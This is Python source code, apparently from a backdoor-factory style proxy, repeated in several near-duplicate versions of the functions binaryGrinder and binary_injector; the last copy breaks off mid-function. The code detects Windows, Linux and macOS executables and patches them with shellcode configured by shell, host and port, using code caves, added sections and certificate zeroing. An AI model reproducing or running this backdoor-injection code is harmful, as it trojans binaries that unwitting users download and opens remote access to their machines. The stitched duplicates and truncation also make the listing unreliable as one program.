def binaryGrinder(self, binaryFile):
"""
Feed potential binaries into this function,
it will return the result PatchedBinary, False, or None
"""
with open(binaryFile, 'r+b') as f:
binaryTMPHandle = f.read()
binaryHeader = binaryTMPHandle[:4]
result = None
try:
if binaryHeader[:2] == 'MZ': # PE/COFF
pe = pefile.PE(data=binaryTMPHandle, fast_load=True)
magic = pe.OPTIONAL_HEADER.Magic
machineType = pe.FILE_HEADER.Machine
# update when supporting more than one arch
if (magic == int('20B', 16) and machineType == 0x8664 and
self.WindowsType.lower() in ['all', 'x64']):
add_section = False
cave_jumping = False
if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
# if automatic override
if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
cave_jumping = True
targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx64['SHELL'],
HOST=self.WindowsIntelx64['HOST'],
PORT=int(self.WindowsIntelx64['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
RUNAS_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']),
PATCH_DLL=self.str2bool(self.WindowsIntelx64['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.str2bool(self.WindowsIntelx64['ZERO_CERT']),
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower(),
SUPPLIED_BINARY=self.WindowsIntelx64['SUPPLIED_BINARY'],
IDT_IN_CAVE=self.str2bool(self.WindowsIntelx64['IDT_IN_CAVE']),
CODE_SIGN=self.str2bool(self.WindowsIntelx64['CODE_SIGN']),
PREPROCESS=self.str2bool(self.WindowsIntelx64['PREPROCESS']),
)
result = targetFile.run_this()
elif (machineType == 0x14c and
self.WindowsType.lower() in ['all', 'x86']):
add_section = False
cave_jumping = False
# add_section wins for cave_jumping
# default is single for BDF
if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
# if automatic override
if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
cave_jumping = True
add_section = False
targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx86['SHELL'],
HOST=self.WindowsIntelx86['HOST'],
PORT=int(self.WindowsIntelx86['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
RUNAS_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']),
PATCH_DLL=self.str2bool(self.WindowsIntelx86['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.str2bool(self.WindowsIntelx86['ZERO_CERT']),
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower(),
SUPPLIED_BINARY=self.WindowsIntelx86['SUPPLIED_BINARY'],
XP_MODE=self.str2bool(self.WindowsIntelx86['XP_MODE']),
IDT_IN_CAVE=self.str2bool(self.WindowsIntelx86['IDT_IN_CAVE']),
CODE_SIGN=self.str2bool(self.WindowsIntelx86['CODE_SIGN']),
PREPROCESS=self.str2bool(self.WindowsIntelx86['PREPROCESS']),
)
result = targetFile.run_this()
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False)
targetFile.support_check()
if targetFile.class_type == 0x1:
# x86CPU Type
targetFile = elfbin.elfbin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx86['SHELL'],
HOST=self.LinuxIntelx86['HOST'],
PORT=int(self.LinuxIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'],
IMAGE_TYPE=self.LinuxType,
PREPROCESS=self.str2bool(self.LinuxIntelx86['PREPROCESS']),
)
result = targetFile.run_this()
elif targetFile.class_type == 0x2:
# x64
targetFile = elfbin.elfbin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx64['SHELL'],
HOST=self.LinuxIntelx64['HOST'],
PORT=int(self.LinuxIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'],
IMAGE_TYPE=self.LinuxType,
PREPROCESS=self.str2bool(self.LinuxIntelx64['PREPROCESS']),
)
result = targetFile.run_this()
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
targetFile.support_check()
# ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
if targetFile.FAT_FILE is True:
if self.FatPriority == 'x86':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx86['SHELL'],
HOST=self.MachoIntelx86['HOST'],
PORT=int(self.MachoIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority,
PREPROCESS=self.str2bool(self.MachoIntelx86['PREPROCESS']),
)
result = targetFile.run_this()
elif self.FatPriority == 'x64':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx64['SHELL'],
HOST=self.MachoIntelx64['HOST'],
PORT=int(self.MachoIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority,
PREPROCESS=self.str2bool(self.MachoIntelx64['PREPROCESS']),
)
result = targetFile.run_this()
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx86['SHELL'],
HOST=self.MachoIntelx86['HOST'],
PORT=int(self.MachoIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority,
PREPROCESS=self.str2bool(self.MachoIntelx86['PREPROCESS']),
)
result = targetFile.run_this()
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx64['SHELL'],
HOST=self.MachoIntelx64['HOST'],
PORT=int(self.MachoIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority,
PREPROCESS=self.str2bool(self.MachoIntelx64['PREPROCESS']),
)
result = targetFile.run_this()
return result
except Exception as e:
EnhancedOutput.print_error('binaryGrinder: {0}'.format(e))
EnhancedOutput.logging_warning("Exception in binaryGrinder {0}".format(e))
return None
def binary_injector(self, binary_file):
# Feed potential binaries into this function,
# it will return the result Patched, False, or None
with open(binary_file, 'r+b') as f:
binary_handle = f.read()
binary_header = binary_handle[:4]
result = None
try:
if binary_header[:2] == 'MZ': # PE/COFF
pe = pefile.PE(data=binary_handle, fast_load=True)
magic = pe.OPTIONAL_HEADER.Magic
machine_type = pe.FILE_HEADER.Machine
add_section = False
cave_jumping = False
windows_binary = None
# update when supporting more than one arch
if magic == int(
'20B', 16
) and machine_type == 0x8664 and self.windows_type.lower() in [
'all', 'x64'
]:
windows_binary = self.windows_binary['x64']
if windows_binary['PATCH_TYPE'].lower() == 'append':
add_section = True
elif windows_binary['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
# if 'automatic', override
if windows_binary['PATCH_TYPE'].lower() == 'automatic':
cave_jumping = True
elif machine_type == 0x14c and self.windows_type.lower() in [
'all', 'x86'
]:
windows_binary = self.windows_binary['x86']
if windows_binary['PATCH_TYPE'].lower() == 'append':
add_section = True
elif windows_binary['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
# if automatic override
if windows_binary['PATCH_TYPE'].lower() == 'automatic':
cave_jumping = True
add_section = False
else:
return None
target_file = pebin.pebin(
FILE=binary_file,
OUTPUT=os.path.basename(binary_file),
SHELL=windows_binary['SHELL'],
HOST=windows_binary['HOST'],
PORT=int(windows_binary['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.windows_type,
RUNAS_ADMIN=self.as_bool(windows_binary['RUNAS_ADMIN']),
PATCH_DLL=self.as_bool(windows_binary['PATCH_DLL']),
SUPPLIED_SHELLCODE=windows_binary['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.as_bool(windows_binary['ZERO_CERT']),
PATCH_METHOD=windows_binary['PATCH_METHOD'].lower(),
SUPPLIED_BINARY=windows_binary['SUPPLIED_BINARY'],
XP_MODE=self.as_bool(windows_binary['XP_MODE']))
result = target_file.run_this()
elif binary_header[:4].encode('hex') == '7f454c46': # ELF
target_file = elfbin.elfbin(FILE=binary_file,
SUPPORT_CHECK=False)
target_file.support_check()
linux_binary = None
if target_file.class_type == 0x1:
linux_binary = self.linux_binary['x86']
elif target_file.class_type == 0x2:
linux_binary = self.linux_binary['x64']
else:
return None
target_file = elfbin.elfbin(
FILE=binary_file,
OUTPUT=os.path.basename(binary_file),
SHELL=linux_binary['SHELL'],
HOST=linux_binary['HOST'],
PORT=int(linux_binary['PORT']),
SUPPLIED_SHELLCODE=linux_binary['SUPPLIED_SHELLCODE'],
IMAGE_TYPE=self.linux_type)
result = target_file.run_this()
elif binary_header[:4].encode('hex') in [
'cefaedfe', 'cffaedfe', 'cafebabe'
]: # Macho
target_file = machobin.machobin(FILE=binary_file,
SUPPORT_CHECK=False)
target_file.support_check()
macho_binary = None
# ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
if target_file.FAT_FILE is True:
if self.fat_priority == 'x86':
macho_binary = self.macho_binary['x86']
elif self.fat_priority == 'x64':
macho_binary = self.macho_binary['x64']
else:
return None
elif target_file.mach_hdrs[0]['CPU Type'] == '0x7':
macho_binary = self.macho_binary['x86']
elif target_file.mach_hdrs[0]['CPU Type'] == '0x1000007':
macho_binary = self.macho_binary['x64']
else:
return None
target_file = machobin.machobin(
FILE=binary_file,
OUTPUT=os.path.basename(binary_file),
SHELL=macho_binary['SHELL'],
HOST=macho_binary['HOST'],
PORT=int(macho_binary['PORT']),
SUPPLIED_SHELLCODE=macho_binary['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.fat_priority)
result = target_file.run_this()
return result
except Exception as e:
EnhancedOutput.print_error('binary_injector: {}'.format(e))
EnhancedOutput.logging_warning(
"Exception in binary_injector: {}".format(e))
return None
def binaryGrinder(self, binaryFile):
"""
Feed potential binaries into this function,
it will return the result PatchedBinary, False, or None
"""
with open(binaryFile, 'r+b') as f:
binaryTMPHandle = f.read()
binaryHeader = binaryTMPHandle[:4]
result = None
try:
if binaryHeader[:2] == 'MZ': # PE/COFF
pe = pefile.PE(data=binaryTMPHandle, fast_load=True)
magic = pe.OPTIONAL_HEADER.Magic
machineType = pe.FILE_HEADER.Machine
# update when supporting more than one arch
if (magic == int('20B', 16) and machineType == 0x8664
and self.WindowsType.lower() in ['all', 'x64']):
add_section = False
cave_jumping = False
if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
# if automatic override
if self.WindowsIntelx64['PATCH_METHOD'].lower(
) == 'automatic':
cave_jumping = True
targetFile = pebin.pebin(
FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx64['SHELL'],
HOST=self.WindowsIntelx64['HOST'],
PORT=int(self.WindowsIntelx64['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
RUNAS_ADMIN=self.str2bool(
self.WindowsIntelx86['RUNAS_ADMIN']),
PATCH_DLL=self.str2bool(
self.WindowsIntelx64['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.
WindowsIntelx64['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.str2bool(
self.WindowsIntelx64['ZERO_CERT']),
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].
lower(),
SUPPLIED_BINARY=self.
WindowsIntelx64['SUPPLIED_BINARY'],
IDT_IN_CAVE=self.str2bool(
self.WindowsIntelx64['IDT_IN_CAVE']),
CODE_SIGN=self.str2bool(
self.WindowsIntelx64['CODE_SIGN']),
PREPROCESS=self.str2bool(
self.WindowsIntelx64['PREPROCESS']),
)
result = targetFile.run_this()
elif (machineType == 0x14c
and self.WindowsType.lower() in ['all', 'x86']):
add_section = False
cave_jumping = False
# add_section wins for cave_jumping
# default is single for BDF
if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
# if automatic override
if self.WindowsIntelx86['PATCH_METHOD'].lower(
) == 'automatic':
cave_jumping = True
add_section = False
targetFile = pebin.pebin(
FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx86['SHELL'],
HOST=self.WindowsIntelx86['HOST'],
PORT=int(self.WindowsIntelx86['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
RUNAS_ADMIN=self.str2bool(
self.WindowsIntelx86['RUNAS_ADMIN']),
PATCH_DLL=self.str2bool(
self.WindowsIntelx86['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.
WindowsIntelx86['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.str2bool(
self.WindowsIntelx86['ZERO_CERT']),
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].
lower(),
SUPPLIED_BINARY=self.
WindowsIntelx86['SUPPLIED_BINARY'],
XP_MODE=self.str2bool(self.WindowsIntelx86['XP_MODE']),
IDT_IN_CAVE=self.str2bool(
self.WindowsIntelx86['IDT_IN_CAVE']),
CODE_SIGN=self.str2bool(
self.WindowsIntelx86['CODE_SIGN']),
PREPROCESS=self.str2bool(
self.WindowsIntelx86['PREPROCESS']),
)
result = targetFile.run_this()
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
targetFile = elfbin.elfbin(FILE=binaryFile,
SUPPORT_CHECK=False)
targetFile.support_check()
if targetFile.class_type == 0x1:
# x86CPU Type
targetFile = elfbin.elfbin(
FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx86['SHELL'],
HOST=self.LinuxIntelx86['HOST'],
PORT=int(self.LinuxIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.
LinuxIntelx86['SUPPLIED_SHELLCODE'],
IMAGE_TYPE=self.LinuxType,
PREPROCESS=self.str2bool(
self.LinuxIntelx86['PREPROCESS']),
)
result = targetFile.run_this()
elif targetFile.class_type == 0x2:
# x64
targetFile = elfbin.elfbin(
FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx64['SHELL'],
HOST=self.LinuxIntelx64['HOST'],
PORT=int(self.LinuxIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.
LinuxIntelx64['SUPPLIED_SHELLCODE'],
IMAGE_TYPE=self.LinuxType,
PREPROCESS=self.str2bool(
self.LinuxIntelx64['PREPROCESS']),
)
result = targetFile.run_this()
elif binaryHeader[:4].encode('hex') in [
'cefaedfe', 'cffaedfe', 'cafebabe'
]: # Macho
targetFile = machobin.machobin(FILE=binaryFile,
SUPPORT_CHECK=False)
targetFile.support_check()
# ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
if targetFile.FAT_FILE is True:
if self.FatPriority == 'x86':
targetFile = machobin.machobin(
FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx86['SHELL'],
HOST=self.MachoIntelx86['HOST'],
PORT=int(self.MachoIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.
MachoIntelx86['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority,
PREPROCESS=self.str2bool(
self.MachoIntelx86['PREPROCESS']),
)
result = targetFile.run_this()
elif self.FatPriority == 'x64':
targetFile = machobin.machobin(
FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx64['SHELL'],
HOST=self.MachoIntelx64['HOST'],
PORT=int(self.MachoIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.
MachoIntelx64['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority,
PREPROCESS=self.str2bool(
self.MachoIntelx64['PREPROCESS']),
)
result = targetFile.run_this()
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
targetFile = machobin.machobin(
FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx86['SHELL'],
HOST=self.MachoIntelx86['HOST'],
PORT=int(self.MachoIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.
MachoIntelx86['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority,
PREPROCESS=self.str2bool(
self.MachoIntelx86['PREPROCESS']),
)
result = targetFile.run_this()
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
targetFile = machobin.machobin(
FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.MachoIntelx64['SHELL'],
HOST=self.MachoIntelx64['HOST'],
PORT=int(self.MachoIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.
MachoIntelx64['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority,
PREPROCESS=self.str2bool(
self.MachoIntelx64['PREPROCESS']),
)
result = targetFile.run_this()
return result
except Exception as e:
EnhancedOutput.print_error('binaryGrinder: {0}'.format(e))
EnhancedOutput.logging_warning(
"Exception in binaryGrinder {0}".format(e))
return None
def binaryGrinder(self, binaryFile):
"""
Feed potential binaries into this function,
it will return the result PatchedBinary, False, or None
"""
with open(binaryFile, 'r+b') as f:
binaryTMPHandle = f.read()
binaryHeader = binaryTMPHandle[:4]
result = None
try:
if binaryHeader[:2] == 'MZ': # PE/COFF
pe = pefile.PE(data=binaryTMPHandle, fast_load=True)
magic = pe.OPTIONAL_HEADER.Magic
machineType = pe.FILE_HEADER.Machine
#update when supporting more than one arch
if (magic == int('20B', 16) and machineType == 0x8664
and self.WindowsType.lower() in ['all', 'x64']):
add_section = False
cave_jumping = False
if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
targetFile = pebin.pebin(
FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx64['SHELL'],
HOST=self.WindowsIntelx64['HOST'],
PORT=int(self.WindowsIntelx64['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
PATCH_DLL=self.convert_to_Bool(
self.WindowsIntelx64['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.
WindowsIntelx64['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.convert_to_Bool(
self.WindowsIntelx64['ZERO_CERT']),
)
result = targetFile.run_this()
elif (machineType == 0x14c
and self.WindowsType.lower() in ['all', 'x86']):
add_section = False
cave_jumping = False
#add_section wins for cave_jumping
#default is single for BDF
if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
targetFile = pebin.pebin(
FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx86['SHELL'],
HOST=self.WindowsIntelx86['HOST'],
PORT=int(self.WindowsIntelx86['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
PATCH_DLL=self.convert_to_Bool(
self.WindowsIntelx86['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.convert_to_Bool(
self.WindowsIntelx86['SUPPLIED_SHELLCODE']),
ZERO_CERT=self.convert_to_Bool(
self.WindowsIntelx86['ZERO_CERT']))
result = targetFile.run_this()
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=True)
targetFile.support_check()
if targetFile.class_type == 0x1:
#x86
targetFile = elfbin.elfbin(
FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx86['SHELL'],
HOST=self.LinuxIntelx86['HOST'],
PORT=int(self.LinuxIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.convert_to_Bool(
self.LinuxIntelx86['SUPPLIED_SHELLCODE']),
IMAGE_TYPE=self.LinuxType)
result = targetFile.run_this()
elif targetFile.class_type == 0x2:
#x64
targetFile = elfbin.elfbin(
FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx64['SHELL'],
HOST=self.LinuxIntelx64['HOST'],
PORT=int(self.LinuxIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.convert_to_Bool(
self.LinuxIntelx64['SUPPLIED_SHELLCODE']),
IMAGE_TYPE=self.LinuxType)
result = targetFile.run_this()
return result
except Exception as e:
print 'Exception', str(e)
logging.warning("EXCEPTION IN binaryGrinder %s", str(e))
return None
def binary_injector(self, binary_file):
# Feed potential binaries into this function,
# it will return the result Patched, False, or None
with open(binary_file, "r+b") as f:
binary_handle = f.read()
binary_header = binary_handle[:4]
result = None
try:
if binary_header[:2] == "MZ": # PE/COFF
pe = pefile.PE(data=binary_handle, fast_load=True)
magic = pe.OPTIONAL_HEADER.Magic
machine_type = pe.FILE_HEADER.Machine
add_section = False
cave_jumping = False
windows_binary = None
# update when supporting more than one arch
if magic == int("20B", 16) and machine_type == 0x8664 and self.windows_type.lower() in ["all", "x64"]:
windows_binary = self.windows_binary["x64"]
if windows_binary["PATCH_TYPE"].lower() == "append":
add_section = True
elif windows_binary["PATCH_TYPE"].lower() == "jump":
cave_jumping = True
# if 'automatic', override
if windows_binary["PATCH_TYPE"].lower() == "automatic":
cave_jumping = True
elif machine_type == 0x14C and self.windows_type.lower() in ["all", "x86"]:
windows_binary = self.windows_binary["x86"]
if windows_binary["PATCH_TYPE"].lower() == "append":
add_section = True
elif windows_binary["PATCH_TYPE"].lower() == "jump":
cave_jumping = True
# if automatic override
if windows_binary["PATCH_TYPE"].lower() == "automatic":
cave_jumping = True
add_section = False
else:
return None
target_file = pebin.pebin(
FILE=binary_file,
OUTPUT=os.path.basename(binary_file),
SHELL=windows_binary["SHELL"],
HOST=windows_binary["HOST"],
PORT=int(windows_binary["PORT"]),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.windows_type,
RUNAS_ADMIN=self.as_bool(windows_binary["RUNAS_ADMIN"]),
PATCH_DLL=self.as_bool(windows_binary["PATCH_DLL"]),
SUPPLIED_SHELLCODE=windows_binary["SUPPLIED_SHELLCODE"],
ZERO_CERT=self.as_bool(windows_binary["ZERO_CERT"]),
PATCH_METHOD=windows_binary["PATCH_METHOD"].lower(),
SUPPLIED_BINARY=windows_binary["SUPPLIED_BINARY"],
XP_MODE=self.as_bool(windows_binary["XP_MODE"]),
)
result = target_file.run_this()
elif binary_header[:4].encode("hex") == "7f454c46": # ELF
target_file = elfbin.elfbin(FILE=binary_file, SUPPORT_CHECK=False)
target_file.support_check()
linux_binary = None
if target_file.class_type == 0x1:
linux_binary = self.linux_binary["x86"]
elif target_file.class_type == 0x2:
linux_binary = self.linux_binary["x64"]
else:
return None
target_file = elfbin.elfbin(
FILE=binary_file,
OUTPUT=os.path.basename(binary_file),
SHELL=linux_binary["SHELL"],
HOST=linux_binary["HOST"],
PORT=int(linux_binary["PORT"]),
SUPPLIED_SHELLCODE=linux_binary["SUPPLIED_SHELLCODE"],
IMAGE_TYPE=self.linux_type,
)
result = target_file.run_this()
elif binary_header[:4].encode("hex") in ["cefaedfe", "cffaedfe", "cafebabe"]: # Macho
target_file = machobin.machobin(FILE=binary_file, SUPPORT_CHECK=False)
target_file.support_check()
macho_binary = None
# ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
if target_file.FAT_FILE is True:
if self.fat_priority == "x86":
macho_binary = self.macho_binary["x86"]
elif self.fat_priority == "x64":
macho_binary = self.macho_binary["x64"]
else:
return None
elif target_file.mach_hdrs[0]["CPU Type"] == "0x7":
macho_binary = self.macho_binary["x86"]
elif target_file.mach_hdrs[0]["CPU Type"] == "0x1000007":
macho_binary = self.macho_binary["x64"]
else:
return None
target_file = machobin.machobin(
FILE=binary_file,
OUTPUT=os.path.basename(binary_file),
SHELL=macho_binary["SHELL"],
HOST=macho_binary["HOST"],
PORT=int(macho_binary["PORT"]),
SUPPLIED_SHELLCODE=macho_binary["SUPPLIED_SHELLCODE"],
FAT_PRIORITY=self.fat_priority,
)
result = target_file.run_this()
return result
except Exception as e:
return None
def binary_injector(self, binary_file):
# Feed potential binaries into this function,
# it will return the result Patched, False, or None
with open(binary_file, 'r+b') as f:
binary_handle = f.read()
binary_header = binary_handle[:4]
result = None
try:
if binary_header[:2] == 'MZ': # PE/COFF
pe = pefile.PE(data=binary_handle, fast_load=True)
magic = pe.OPTIONAL_HEADER.Magic
machine_type = pe.FILE_HEADER.Machine
add_section = False
cave_jumping = False
windows_binary = None
# update when supporting more than one arch
if magic == int('20B', 16) and machine_type == 0x8664 and self.windows_type.lower() in ['all', 'x64']:
windows_binary = self.windows_binary['x64']
if windows_binary['PATCH_TYPE'].lower() == 'append':
add_section = True
elif windows_binary['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
# if 'automatic', override
if windows_binary['PATCH_TYPE'].lower() == 'automatic':
cave_jumping = True
elif machine_type == 0x14c and self.windows_type.lower() in ['all', 'x86']:
windows_binary = self.windows_binary['x86']
if windows_binary['PATCH_TYPE'].lower() == 'append':
add_section = True
elif windows_binary['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
# if automatic override
if windows_binary['PATCH_TYPE'].lower() == 'automatic':
cave_jumping = True
add_section = False
else:
return None
target_file = pebin.pebin(FILE=binary_file,
OUTPUT=os.path.basename(binary_file),
SHELL=windows_binary['SHELL'],
HOST=windows_binary['HOST'],
PORT=int(windows_binary['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.windows_type,
RUNAS_ADMIN=self.as_bool(windows_binary['RUNAS_ADMIN']),
PATCH_DLL=self.as_bool(windows_binary['PATCH_DLL']),
SUPPLIED_SHELLCODE=windows_binary['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.as_bool(windows_binary['ZERO_CERT']),
PATCH_METHOD=windows_binary['PATCH_METHOD'].lower(),
SUPPLIED_BINARY=windows_binary['SUPPLIED_BINARY'],
XP_MODE=self.as_bool(windows_binary['XP_MODE'])
)
result = target_file.run_this()
elif binary_header[:4].encode('hex') == '7f454c46': # ELF
target_file = elfbin.elfbin(FILE=binary_file, SUPPORT_CHECK=False)
target_file.support_check()
linux_binary = None
if target_file.class_type == 0x1:
linux_binary = self.linux_binary['x86']
elif target_file.class_type == 0x2:
linux_binary = self.linux_binary['x64']
else:
return None
target_file = elfbin.elfbin(FILE=binary_file,
OUTPUT=os.path.basename(binary_file),
SHELL=linux_binary['SHELL'],
HOST=linux_binary['HOST'],
PORT=int(linux_binary['PORT']),
SUPPLIED_SHELLCODE=linux_binary['SUPPLIED_SHELLCODE'],
IMAGE_TYPE=self.linux_type
)
result = target_file.run_this()
elif binary_header[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
target_file = machobin.machobin(FILE=binary_file, SUPPORT_CHECK=False)
target_file.support_check()
macho_binary = None
# ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
if target_file.FAT_FILE is True:
if self.fat_priority == 'x86':
macho_binary = self.macho_binary['x86']
elif self.fat_priority == 'x64':
macho_binary = self.macho_binary['x64']
else:
return None
elif target_file.mach_hdrs[0]['CPU Type'] == '0x7':
macho_binary = self.macho_binary['x86']
elif target_file.mach_hdrs[0]['CPU Type'] == '0x1000007':
macho_binary = self.macho_binary['x64']
else:
return None
target_file = machobin.machobin(FILE=binary_file,
OUTPUT=os.path.basename(binary_file),
SHELL=macho_binary['SHELL'],
HOST=macho_binary['HOST'],
PORT=int(macho_binary['PORT']),
SUPPLIED_SHELLCODE=macho_binary['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.fat_priority
)
result = target_file.run_this()
return result
except Exception as e:
EnhancedOutput.print_error('binary_injector: {}'.format(e))
EnhancedOutput.logging_warning("Exception in binary_injector: {}".format(e))
return None
def binaryGrinder(self, binaryFile):
"""
Feed potential binaries into this function,
it will return the result PatchedBinary, False, or None
"""
with open(binaryFile, 'r+b') as f:
binaryTMPHandle = f.read()
binaryHeader = binaryTMPHandle[:4]
result = None
try:
if binaryHeader[:2] == 'MZ': # PE/COFF
pe = pefile.PE(data=binaryTMPHandle, fast_load=True)
magic = pe.OPTIONAL_HEADER.Magic
machineType = pe.FILE_HEADER.Machine
#update when supporting more than one arch
if (magic == int('20B', 16) and machineType == 0x8664 and
self.WindowsType.lower() in ['all', 'x64']):
add_section = False
cave_jumping = False
if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
